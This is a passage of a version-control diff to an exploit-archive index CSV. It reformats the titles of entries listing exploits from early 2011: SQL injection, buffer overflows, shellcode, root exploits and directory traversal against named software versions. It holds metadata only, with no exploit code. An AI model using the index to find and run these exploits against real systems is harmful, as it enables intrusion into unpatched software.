Auriemma",windows,dos,0 -15993,platforms/php/webapps/15993.html,"viart shop v4.0.5 CSRF Vulnerability",2011-01-15,Or4nG.M4N,php,webapps,0 +15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - CSRF Vulnerability",2011-01-15,Or4nG.M4N,php,webapps,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 15995,platforms/php/webapps/15995.txt,"glFusion CMS 1.2.1 Stored XSS via img Tag",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 -15997,platforms/jsp/webapps/15997.py,"MeshCMS v3.5 Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 +15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0 @@ -13848,7 +13848,7 @@ id,file,description,date,author,platform,type,port 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 Blind SQL Injection Vulnerability",2011-01-18,"Salvatore Fresta",php,webapps,0 16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 unserialize() Vulnerability",2011-01-18,felix,php,webapps,0 -16012,platforms/windows/dos/16012.html,"Google Chrome v8.0.552.237 address overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 +16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 @@ -13861,12 +13861,12 @@ id,file,description,date,author,platform,type,port 16024,platforms/windows/local/16024.txt,"Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 16025,platforms/bsd_x86/shellcode/16025.c,"BSD x86 connect back Shellcode (81 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16026,platforms/bsd_x86/shellcode/16026.c,"BSD x86 portbind + fork shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 -16027,platforms/php/webapps/16027.txt,"phpcms V9 Blind SQL Injection Vulnerability",2011-01-22,eidelweiss,php,webapps,0 +16027,platforms/php/webapps/16027.txt,"phpcms 9.0 - Blind SQL Injection Vulnerability",2011-01-22,eidelweiss,php,webapps,0 16028,platforms/php/webapps/16028.txt,"CultBooking 2.0.4 Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 16034,platforms/php/webapps/16034.txt,"PHP Coupon Script v. 6.0 (bus) Blind SQL Injection Vulnerability",2011-01-23,"BorN To K!LL",php,webapps,0 16035,platforms/windows/dos/16035.py,"Inetserv 3.23 SMTP Denial of Service Vulnerability",2011-01-23,G13,windows,dos,0 -16036,platforms/windows/remote/16036.rb,"Golden FTP Server v4.70 PASS Command Buffer Overflow Exploit",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 -16037,platforms/php/webapps/16037.html,"PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,php,webapps,0 +16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 +16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - CSRF Vulnerability (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,php,webapps,0 16038,platforms/windows/dos/16038.py,"Inetserv 3.23 POP3 Denial of Service",2011-01-24,dmnt,windows,dos,0 16039,platforms/php/webapps/16039.txt,"Joomla B2 Portfolio Component 1.0.0 Multiple SQL Injection",2011-01-24,"Salvatore Fresta",php,webapps,0 16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC",2011-01-25,"Jeremy Brown",windows,dos,0 @@ -13874,7 +13874,7 @@ id,file,description,date,author,platform,type,port 16042,platforms/windows/dos/16042.rb,"Opera Web Browser 11.00 Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",windows,dos,0 16044,platforms/php/webapps/16044.txt,"AB WEB CMS 1.35 - Multiple Remote Vulnerabilities",2011-01-25,"Dr.0rYX and Cr3w-DZ",php,webapps,0 16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition (game.php) SQL Injection Vulnerability",2011-01-26,AtT4CKxT3rR0r1ST,php,webapps,0 -16049,platforms/php/webapps/16049.txt,"AWCM v2.2 final Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0 +16049,platforms/php/webapps/16049.txt,"AWCM 2.2 final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0 16050,platforms/php/webapps/16050.txt,"class.upload.php v 0.30 Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 16051,platforms/php/webapps/16051.txt,"Froxlor v 0.9.15 Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 @@ -13899,17 +13899,17 @@ id,file,description,date,author,platform,type,port 16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks",2011-01-30,MaXe,php,webapps,0 16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0 16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit",2011-01-30,sup3r,windows,remote,0 -16079,platforms/multiple/dos/16079.html,"Google Chrome v8.0.552.237 .replace DOS",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0 -16080,platforms/php/webapps/16080.txt,"RW-Download v4.0.6 (index.php) SQL Injection Vulnerability",2011-01-30,Dr.NeT,php,webapps,0 +16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - .replace DOS",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0 +16080,platforms/php/webapps/16080.txt,"RW-Download 4.0.6 - (index.php) SQL Injection Vulnerability",2011-01-30,Dr.NeT,php,webapps,0 16083,platforms/windows/local/16083.rb,"NetZip Classic Buffer Overflow Exploit (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0 -16084,platforms/windows/dos/16084.html,"Maxthon Browser v3.0.20.1000 .ref .replace DOS",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 +16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - .ref .replace DOS",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 16085,platforms/windows/local/16085.py,"AOL 9.5 (rtx) Local Buffer Overflow Exploit",2011-01-31,sup3r,windows,local,0 16086,platforms/linux/local/16086.txt,"OpenVAS Manager Command Injection Vulnerability",2011-01-31,"Tim Brown",linux,local,0 16087,platforms/php/webapps/16087.txt,"PMB Services <= 3.4.3 SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 16088,platforms/php/webapps/16088.php,"NetLink Arbitrary File Upload Vulnerability",2011-02-01,lumut--,php,webapps,0 16090,platforms/php/webapps/16090.txt,"TinyWebGallery v 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 -16091,platforms/php/webapps/16091.txt,"Joomla! v1.5 + v1.6 JFilterInput XSS Bypass",2011-02-01,"Jeff Channell",php,webapps,0 -16092,platforms/windows/local/16092.py,"CodeBlocks v8.02 (cbp) Buffer Overflow Exploit",2011-02-01,sup3r,windows,local,0 +16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput XSS Bypass",2011-02-01,"Jeff Channell",php,webapps,0 +16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow Exploit",2011-02-01,sup3r,windows,local,0 16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 Local File Inclusion Vulnerability",2011-02-02,h0rd,php,webapps,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16096,platforms/php/webapps/16096.txt,"Redaxscript 0.3.2 Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 @@ -13917,11 +13917,11 @@ id,file,description,date,author,platform,type,port 16098,platforms/hardware/local/16098.c,"Android 1.x/2.x HTC Wildfire Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0 16099,platforms/hardware/local/16099.c,"Android 1.x/2.x Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0 16100,platforms/hardware/remote/16100.txt,"Tandberg E, EX and C Series Endpoints Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 -16101,platforms/windows/remote/16101.py,"FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 -16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 +16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 +16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 16105,platforms/windows/remote/16105.txt,"QuickShare File Share 1.2.1 Directory Traversal Vulnerability",2011-02-03,modpr0be,windows,remote,0 -16106,platforms/php/webapps/16106.txt,"OemPro v3.6.4 Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 +16106,platforms/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 .rtx Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16109,platforms/php/webapps/16109.txt,"Podcast Generator 1.3 Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 @@ -13930,18 +13930,18 @@ id,file,description,date,author,platform,type,port 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script SQL Injection Vunerability",2011-02-05,NoNameMT,php,webapps,0 -16119,platforms/freebsd/local/16119.c,"FreeBSD <= 5.4-RELEASE ftpd (Version 6.00LS) sendfile kernel mem-leak Exploit",2011-02-06,Kingcope,freebsd,local,0 +16119,platforms/freebsd/local/16119.c,"FreeBSD <= 5.4-RELEASE ftpd (Version 6.00LS) - sendfile kernel mem-leak Exploit",2011-02-06,Kingcope,freebsd,local,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile",2011-02-06,badc0re,windows,dos,0 -16121,platforms/windows/dos/16121.py,"Hanso Converter v1.1.0 BufferOverflow - Denial Of Service",2011-02-06,badc0re,windows,dos,0 +16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b (index.php) - SQL Injection Vulnerability",2011-02-06,AtT4CKxT3rR0r1ST,php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"JAKCMS 2.0 PRO RC5 stored XSS via useragent HTTP header Injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,Kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0 -16131,platforms/php/webapps/16131.txt,"SWFUpload v2.5.0 Beta 3 File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 -16132,platforms/windows/local/16132.htm,"AoA DVD Creator V2.5 ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 -16133,platforms/windows/local/16133.htm,"AoA Mp4 converter v4.1.0 ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 +16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 +16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 +16133,platforms/windows/local/16133.htm,"AoA Mp4 converter 4.1.0 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16134,platforms/php/webapps/16134.txt,"Model Agentur Script SQL Injection Vunerability",2011-02-08,NoNameMT,php,webapps,0 16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 @@ -13956,17 +13956,17 @@ id,file,description,date,author,platform,type,port 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 XSS Vulnerability",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N Unauthenticated Root Access Security Vulnerability",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 (TYPE) Denial Of Service",2011-02-10,"Houssam Sahli",windows,dos,0 -16152,platforms/multiple/webapps/16152.py,"LocatePC v1.05 (Ligatt Version + Others) Trivial SQLi",2011-02-10,anonymous,multiple,webapps,0 +16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - Trivial SQL Injection",2011-02-10,Anonymous,multiple,webapps,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 (.lst) Buffer Overflow",2011-02-11,sickness,windows,local,0 16154,platforms/php/webapps/16154.txt,"Horde Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 16155,platforms/php/webapps/16155.txt,"Geomi CMS SQL Injection Vulnerability",2011-02-11,"ThunDEr HeaD",php,webapps,0 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13, < 1.6.3 SQL Injection Vulnerability",2011-02-11,"Red Matter",php,webapps,0 -16157,platforms/jsp/webapps/16157.py,"Openedit <= v5.1294 Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 +16157,platforms/jsp/webapps/16157.py,"Openedit <= 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS Blind SQL Injection Vunerability",2011-02-12,NoNameMT,php,webapps,0 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 Multiple POST Variables SQL Injection Vulnerability",2011-02-12,LiquidWorm,php,webapps,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 Buffer Overflow Exploit",2011-02-12,"C4SS!0 G0M3S",windows,local,0 -16165,platforms/php/webapps/16165.txt,"AWCM v2.2 final Persistent Cross Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 +16165,platforms/php/webapps/16165.txt,"AWCM 2.2 final - Persistent Cross Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 16166,platforms/windows/dos/16166.py,"MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection Vulnerability",2011-02-14,eXa.DisC,php,webapps,0 16168,platforms/php/webapps/16168.txt,"RunCMS 2.2.2 Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 @@ -13974,13 +13974,13 @@ id,file,description,date,author,platform,type,port 16170,platforms/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 SQL Injection Vulnerability",2011-02-15,#forkbombers,php,webapps,0 16171,platforms/cfm/webapps/16171.py,"Lingxia I.C.E CMS Remote Blind SQL Injection Exploit",2011-02-15,mr_me,cfm,webapps,0 16172,platforms/php/webapps/16172.txt,"OmegaBill 1.0 Build 6 Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 -16173,platforms/windows/local/16173.py,"AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 +16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 16177,platforms/windows/remote/16177.py,"ActFax Server FTP Remote BOF (post auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 -16180,platforms/windows/dos/16180.py,"BWMeter v5.4.0 (.csv) Denial of Service Vulnerability",2011-02-17,b0telh0,windows,dos,0 +16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service Vulnerability",2011-02-17,b0telh0,windows,dos,0 16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Remote File Upload Vulnerability",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 @@ -13992,16 +13992,16 @@ id,file,description,date,author,platform,type,port 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS Blind SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a HTTP Referer stored XSS",2011-02-20,"Saif El-Sherei",php,webapps,0 -16200,platforms/php/webapps/16200.py,"JAKCMS <= v2.01 Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 -16201,platforms/php/webapps/16201.py,"JAKCMS <= v2.01 RC1 Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 +16200,platforms/php/webapps/16200.py,"JAKCMS <= 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 +16201,platforms/php/webapps/16201.py,"JAKCMS <= 2.01 RC1 - Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 16202,platforms/php/webapps/16202.txt,"Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability",2011-02-21,Crazyball,php,webapps,0 -16203,platforms/windows/dos/16203.txt,"WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability",2011-02-22,LiquidWorm,windows,dos,0 +16203,platforms/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow Vulnerability",2011-02-22,LiquidWorm,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 Denial of Service Exploit",2011-02-22,x000,windows,dos,0 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 Local File Inclusion Vulnerability",2011-02-22,lemlajt,php,webapps,0 16207,platforms/php/webapps/16207.txt,"Dotproject 2.1.5 Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 -16208,platforms/hardware/remote/16208.txt,"FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 -16209,platforms/hardware/remote/16209.txt,"SideBooks v1.0 for iPhone / iPod touch, Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16208,platforms/hardware/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16209,platforms/hardware/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,AtT4CKxT3rR0r1ST,php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats (player.php) SQL Injection Vulnerability",2011-02-23,AtT4CKxT3rR0r1ST,php,webapps,0 16216,platforms/linux/dos/16216.txt,"Red Hat Linux stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0 @@ -14012,12 +14012,12 @@ id,file,description,date,author,platform,type,port 16222,platforms/php/webapps/16222.txt,"Course Registration Management System 2.1 Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript SQL Injection Vulnerability",2011-02-23,ThEtA.Nu,php,webapps,0 16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0 -16226,platforms/hardware/remote/16226.txt,"Air Files v2.6 for iPhone / iPod touch, Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 -16227,platforms/hardware/remote/16227.txt,"Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 -16228,platforms/hardware/remote/16228.txt,"iDocManager v1.0.0 for iPhone / iPod touch, Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 -16229,platforms/hardware/remote/16229.txt,"myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16228,platforms/hardware/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16229,platforms/hardware/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 Denial of Service Exploit",2011-02-24,"C4SS!0 G0M3S",windows,dos,0 -16231,platforms/hardware/remote/16231.txt,"Share v1.0 for iPhone / iPod touch, Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 +16231,platforms/hardware/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 16234,platforms/netware/dos/16234.rb,"Novell Netware RPC XNFS xdrDecodeString Vulnerability",2011-02-24,"Francis Provencher",netware,dos,0 @@ -14028,12 +14028,12 @@ id,file,description,date,author,platform,type,port 16239,platforms/hardware/remote/16239.txt,"iPhone Guitar Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 16240,platforms/hardware/remote/16240.txt,"iPhone PDF Reader Pro 2.3 Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 16241,platforms/asp/webapps/16241.txt,"RaksoCT Multiple SQL Injection Vulnerabilities",2011-02-25,p0pc0rn,asp,webapps,0 -16242,platforms/windows/remote/16242.html,"Edraw Office Viewer Component V7.4 ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",windows,remote,0 +16242,platforms/windows/remote/16242.html,"Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",windows,remote,0 16243,platforms/hardware/remote/16243.py,"iPhone Folders 2.5 Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 16244,platforms/hardware/remote/16244.py,"iPhone iFile 2.0 Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 16245,platforms/hardware/remote/16245.py,"iPhone MyDocs 2.7 Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 16246,platforms/php/webapps/16246.py,"Joomla XCloner Component (com_xcloner-backupandrestore) Remote Command Execution",2011-02-25,mr_me,php,webapps,0 -16247,platforms/php/webapps/16247.txt,"Pragyan CMS v3.0 Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 +16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16249,platforms/php/webapps/16249.txt,"PhreeBooks R30RC4 Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 @@ -14055,16 +14055,16 @@ id,file,description,date,author,platform,type,port 16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.1 Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 -16271,platforms/hardware/remote/16271.txt,"TIOD v1.3.3 for iPhone / iPod touch Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",hardware,remote,0 +16271,platforms/hardware/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",hardware,remote,0 16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection Vulnerability",2011-03-04,eXeSoul,php,webapps,0 16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 Wordpress Plugin (admin_container.php) Remote Code Exec Exploit",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,Kingcope,jsp,webapps,0 16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 